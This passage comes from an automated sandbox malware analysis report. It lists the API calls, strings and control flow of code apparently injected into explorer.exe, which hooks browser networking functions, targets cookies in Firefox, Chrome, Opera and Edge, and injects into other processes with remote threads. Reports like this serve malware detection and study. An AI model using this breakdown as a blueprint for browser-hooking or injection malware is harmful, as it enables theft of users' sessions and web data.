81->85 86 3223d76-3223d77 CloseHandle 81->86 82->50 91 3223af7-3223b01 82->91 88 3223ca7-3223cb5 lstrcmpiA 85->88 89 3223cda-3223ce3 call 32212aa 85->89 86->77 88->89 93 3223cb7-3223cc5 lstrcmpiA 88->93 97 3223d62-3223d68 Process32Next 89->97 98 3223ce5-3223cee call 3221305 89->98 91->62 93->89 95 3223cc7-3223cd4 call 3222ea8 93->95 95->89 95->97 97->81 98->97 102 3223cf0-3223cf7 call 3221320 98->102 102->97 105 3223cf9-3223d06 call 3221274 102->105 105->97 108 3223d08-3223d5d lstrcmpiA call 3221090 call 3221fe5 call 3221090 105->108 108->97
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 03223886
                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000001), ref: 0322389B
                                                                                                                                      • wsprintfA.USER32 ref: 032238B6
                                                                                                                                        • Part of subcall function 0322118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 032211A9
                                                                                                                                        • Part of subcall function 0322118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 032211C1
                                                                                                                                        • Part of subcall function 0322118D: lstrlen.KERNEL32(?,00000000), ref: 032211C9
                                                                                                                                        • Part of subcall function 0322118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 032211D4
                                                                                                                                        • Part of subcall function 0322118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 032211EE
                                                                                                                                        • Part of subcall function 0322118D: wsprintfA.USER32 ref: 03221205
                                                                                                                                        • Part of subcall function 0322118D: CryptDestroyHash.ADVAPI32(?), ref: 0322121E
                                                                                                                                        • Part of subcall function 0322118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 03221228
                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 032238CD
                                                                                                                                      • GetLastError.KERNEL32 ref: 032238D3
                                                                                                                                      • RtlInitializeCriticalSection.NTDLL(03226038), ref: 032238F3
                                                                                                                                      • PathFindFileNameA.SHLWAPI(?), ref: 032238FA
                                                                                                                                      • lstrcat.KERNEL32(03225CDE,00000000), ref: 03223910
                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0322392A
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0322393C
                                                                                                                                      • GetCommandLineW.KERNEL32(?), ref: 0322394F
                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0322397E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03223987
                                                                                                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 032239AF
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 032239B2
                                                                                                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 032239C4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 032239C7
                                                                                                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 032239E1
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 032239E4
                                                                                                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 032239EC
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 032239EF
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 03223A6D
                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 03223A78
                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 03223A7B
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 03223A8E
                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 03223A9D
                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 03223AA0
                                                                                                                                      • GetModuleHandleA.KERNEL32(opera.dll), ref: 03223ABF
                                                                                                                                      • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 03223ACC
                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 03223956
                                                                                                                                        • Part of subcall function 032216C7: GetCurrentProcessId.KERNEL32 ref: 032216D9
                                                                                                                                        • Part of subcall function 032216C7: GetCurrentThreadId.KERNEL32 ref: 032216E1
                                                                                                                                        • Part of subcall function 032216C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 032216F1
                                                                                                                                        • Part of subcall function 032216C7: Thread32First.KERNEL32(00000000,0000001C), ref: 032216FF
                                                                                                                                        • Part of subcall function 032216C7: CloseHandle.KERNEL32(00000000), ref: 03221758
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 03223A10
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 03223A20
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 03223A30
                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 03223A47
                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 03223A4A
                                                                                                                                      • GetModuleHandleA.KERNEL32(chrome.dll), ref: 03223A5F
                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 03223B2C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03223B35
                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 03223B52
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03223B55
                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 03223B72
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03223B75
                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 03223B99
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03223B9C
                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 03223BA9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03223BAC
                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 03223BB9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03223BBC
                                                                                                                                        • Part of subcall function 03221C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 03221C42
                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 03223BD9
                                                                                                                                      • wsprintfA.USER32 ref: 03223C1F
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03223C69
                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 03223C88
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 03223D77
                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 03223D82
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                                                                                                      • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                                                                                                      • API String ID: 2480436012-2618538661
                                                                                                                                      • Opcode ID: 096efdb043fcddc2accb73bda534ddacc2da4712c7f8d231026e6c5444d6c0a8
                                                                                                                                      • Instruction ID: fdd413dde833440d2a516f07a10878a8e3b4e7813686fb19a07749bae345363b
                                                                                                                                      • Opcode Fuzzy Hash: 096efdb043fcddc2accb73bda534ddacc2da4712c7f8d231026e6c5444d6c0a8
                                                                                                                                      • Instruction Fuzzy Hash: E2A1E675A70335BBC620FB73BC0CE2F7E9CAF50A41B054515FA11A7145DBB8DAC18AA1
                                                                                                                                      Function 03223BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130stringsleepprocessCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • wsprintfA.USER32 ref: 03223C1F
                                                                                                                                        • Part of subcall function 03221235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0322123F
                                                                                                                                        • Part of subcall function 03221235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03223C33), ref: 03221251
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03223C69
                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 03223C88
                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 03223CA1
                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 03223CB1
                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03223CC1
                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03223D12
                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 03223D68
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 03223D77
                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 03223D82
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                      • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                                                                                                      • API String ID: 2509890648-2554907557
                                                                                                                                      • Opcode ID: a7204b18c687aad88399b698b212d41ce622c72222bccce2bfa7fc644b7daf91
                                                                                                                                      • Instruction ID: a0d823a881309727e7d418a86311e6904a2cd1c4d494c90ecff2e39bb318ed21
                                                                                                                                      • Opcode Fuzzy Hash: a7204b18c687aad88399b698b212d41ce622c72222bccce2bfa7fc644b7daf91
                                                                                                                                      • Instruction Fuzzy Hash: 4F412839620331BBC634FB75EC48E7E7FADAF94A00F044618B95187184DF68EA8586A1
                                                                                                                                      Function 03223D8D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 159 3223d8d-3223d97 call 3221274 162 3223e03-3223e04 159->162 163 3223d99-3223dc2 call 3221000 RtlMoveMemory 159->163 166 3223dc4-3223de2 call 3221000 RtlMoveMemory 163->166 167 3223de8-3223dfc 163->167 166->167 171 3223e0a-3223e15 call 3223be1 167->171 172 3223dfe-3223dff 167->172 178 3223e20-3223e23 171->178 179 3223e17-3223e1b call 3223d8d 171->179 172->162 173 3223e01-3223e05 call 3223862 172->173 173->171 179->178
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03221281
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03223DAF
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 03223DE2
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 03223DEB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                                                                                                      • String ID: 0-Fw
                                                                                                                                      • API String ID: 4050682147-2310602258
                                                                                                                                      • Opcode ID: 39c4b660841dce020d9207b1cc714f9f6248fb3d42e9056219a9e1811dbc8204
                                                                                                                                      • Instruction ID: 77603e4b9091ee2328a15020a148c12c35fdd0e471573a0a565f9f380292d0b8
                                                                                                                                      • Opcode Fuzzy Hash: 39c4b660841dce020d9207b1cc714f9f6248fb3d42e9056219a9e1811dbc8204
                                                                                                                                      • Instruction Fuzzy Hash: 7001DE39424221FBC628FB25EC4CA667F58AF10201B048599A9118B194CBBA96C5DAA0
                                                                                                                                      Function 03222EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 184 3222ea8-3222ebc StrStrIA 185 3222ebe-3222eca call 3222e1b 184->185 186 3222ecd-3222ed1 184->186 185->186
                                                                                                                                      APIs
                                                                                                                                      • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,03223CD2), ref: 03222EB4
                                                                                                                                        • Part of subcall function 03222E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03222EC5), ref: 03222E27
                                                                                                                                        • Part of subcall function 03222E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03222E52
                                                                                                                                        • Part of subcall function 03222E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03222E7F
                                                                                                                                        • Part of subcall function 03222E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 03222E92
                                                                                                                                      Strings
                                                                                                                                      • chrome.exe|opera.exe|msedge.exe, xrefs: 03222EAB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$InformationQuery$Open
                                                                                                                                      • String ID: chrome.exe|opera.exe|msedge.exe
                                                                                                                                      • API String ID: 4117927671-3743313796
                                                                                                                                      • Opcode ID: b1e726133f3e0478639d39ee7ec4bb7fbf4edc6fc8946de3c295a6eed577cefc
                                                                                                                                      • Instruction ID: 63723b9be142e37c2b763a82fc0e3583431ddaeb2960d9db49c759ec67bbe84d
                                                                                                                                      • Opcode Fuzzy Hash: b1e726133f3e0478639d39ee7ec4bb7fbf4edc6fc8946de3c295a6eed577cefc
                                                                                                                                      • Instruction Fuzzy Hash: 8AD0A9323203316B576DB97B6C0982FA88DCACA862306453EE802C7200EA819C8342E0
                                                                                                                                      Function 03221235 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 181 3221235-3221247 OpenFileMappingA 182 3221249-3221259 MapViewOfFile 181->182 183 322125c-3221260 181->183 182->183
                                                                                                                                      APIs
                                                                                                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0322123F
                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03223C33), ref: 03221251
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                      • Opcode ID: 6c224f9030218a0870cdce3f4390a32246accf77c0448ec3cb5cca05b359bfe4
                                                                                                                                      • Instruction ID: d1f2c7673b9d066449d4bce67885f48fe82b57802e5806be68987d0482fdd052
                                                                                                                                      • Opcode Fuzzy Hash: 6c224f9030218a0870cdce3f4390a32246accf77c0448ec3cb5cca05b359bfe4
                                                                                                                                      • Instruction Fuzzy Hash: D2D017327152317BE3386ABB6C0CF83AE9DDF96AE1B058125B509D2140D6608860C2F0
                                                                                                                                      Function 03221261 Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 189 3221261-3221273 UnmapViewOfFile CloseHandle
                                                                                                                                      APIs
                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,00000000,03223C5E,00000001), ref: 03221265
                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0322126C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFileHandleUnmapView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2381555830-0
                                                                                                                                      • Opcode ID: ebcd01f59458d0330a9d36323fe6aea853bd76caf82dcc2f0744f33f42cd8739
                                                                                                                                      • Instruction ID: 04ad9f1d053893b6532d00f971fdc157f90fbd8440887cde4bc61d67363cc8d6
                                                                                                                                      • Opcode Fuzzy Hash: ebcd01f59458d0330a9d36323fe6aea853bd76caf82dcc2f0744f33f42cd8739
                                                                                                                                      • Instruction Fuzzy Hash: DFB09236429020E7823837667C0C8CA3A189A69221302D140B00E8200846240A8186A8
                                                                                                                                      Function 03221000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 190 3221000-3221010 GetProcessHeap RtlAllocateHeap
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                      • Opcode ID: e61b5b419c477000bd00002e0295ee0d2739decc76b8fd9e35ca45f8f1705757
                                                                                                                                      • Instruction ID: 0457890811eb2fcfe37a1a70efa8adc765c17088bb528bbfe2df5b113b70ba69
                                                                                                                                      • Opcode Fuzzy Hash: e61b5b419c477000bd00002e0295ee0d2739decc76b8fd9e35ca45f8f1705757
                                                                                                                                      • Instruction Fuzzy Hash: 84A012B0510100BBDE1837A1BC0DF153518F750301F00D004710681044896001548F20

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 03221FE5 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03221281
                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,7556E800), ref: 0322201A
                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03222055
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 032220E5
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,032250A0,00000016), ref: 0322210C
                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03222134
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03222144
                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0322215E
                                                                                                                                      • GetLastError.KERNEL32 ref: 03222166
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 03222174
                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0322217B
                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 03222191
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03222198
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 032221AE
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 032221D8
                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032221EB
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 032221F2
                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 032221F9
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0322220D
                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03222224
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 03222231
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03222237
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0322223D
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 03222240
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                      • String ID: 0-Fw$atan$ntdll$opera_shared_counter
                                                                                                                                      • API String ID: 1066286714-2890147644
                                                                                                                                      • Opcode ID: acb68d32738f095d54c6768d17fac5528688d37154eeb5ff32c8313cb5c2d216
                                                                                                                                      • Instruction ID: 883647b3167d6b4ad7feb258e6e16c0cb56cf0af633a0cc0d15d00ae70b360fe
                                                                                                                                      • Opcode Fuzzy Hash: acb68d32738f095d54c6768d17fac5528688d37154eeb5ff32c8313cb5c2d216
                                                                                                                                      • Instruction Fuzzy Hash: 8961AF31504325BFD320EF62DC88E6BBFECEB58750F044619B948D3251D775DA848B61
                                                                                                                                      Function 032215BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87filestringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*,755AF770,00000000,76EEB2E0,774783D0), ref: 032215EB
                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 032215F7
                                                                                                                                      • lstrcmpiW.KERNEL32(?,032241C8), ref: 03221623
                                                                                                                                      • lstrcmpiW.KERNEL32(?,032241CC), ref: 03221633
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0322164C
                                                                                                                                      • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 03221661
                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0322167E
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0322169C
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 032216AB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                                                                                                      • String ID: *.*$Cookies*
                                                                                                                                      • API String ID: 4256701249-3228320225
                                                                                                                                      • Opcode ID: 54ce34522268b9d1515690fa143714968ba6357af3a16ed1cd44e90ffff7fc9c
                                                                                                                                      • Instruction ID: 92baee3def360814ef50d24533d37c4d040e8d0a43b8383244b90a7c2083c291
                                                                                                                                      • Opcode Fuzzy Hash: 54ce34522268b9d1515690fa143714968ba6357af3a16ed1cd44e90ffff7fc9c
                                                                                                                                      • Instruction Fuzzy Hash: F921A7302143257FD314FA62EC48E7F7F9CEB98781F080529F941D3244DA74EA944AA2
                                                                                                                                      Function 032214D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 032213FE: wsprintfW.USER32 ref: 0322142A
                                                                                                                                        • Part of subcall function 032213FE: FindFirstFileW.KERNEL32(00000000,?), ref: 03221439
                                                                                                                                        • Part of subcall function 032213FE: wsprintfW.USER32 ref: 03221476
                                                                                                                                        • Part of subcall function 032213FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0322149C
                                                                                                                                        • Part of subcall function 032213FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 032214AF
                                                                                                                                        • Part of subcall function 032213FE: FindClose.KERNEL32(00000000), ref: 032214BA
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • wsprintfW.USER32 ref: 0322150D
                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
                                                                                                                                      • wsprintfW.USER32 ref: 03221557
                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
                                                                                                                                      • DeleteFileW.KERNEL32(00000000), ref: 03221571
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0322158F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                      • String ID: %s%s$*.*
                                                                                                                                      • API String ID: 2055899612-705776850
                                                                                                                                      • Opcode ID: 007d40ed8d3952a7bc7a363c10dff8aa7333e20d379033abc4c47db362f096ce
                                                                                                                                      • Instruction ID: c64d6a3ccfa93b2c05d2e70e5cb5be7d9540b139089befb6791f7ad2c51ceae9
                                                                                                                                      • Opcode Fuzzy Hash: 007d40ed8d3952a7bc7a363c10dff8aa7333e20d379033abc4c47db362f096ce
                                                                                                                                      • Instruction Fuzzy Hash: 4A1124312103207FD324FB36AC4CE6F7F9CEF95654F000559FE5286282DB74AAE586A6
                                                                                                                                      Function 032213FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
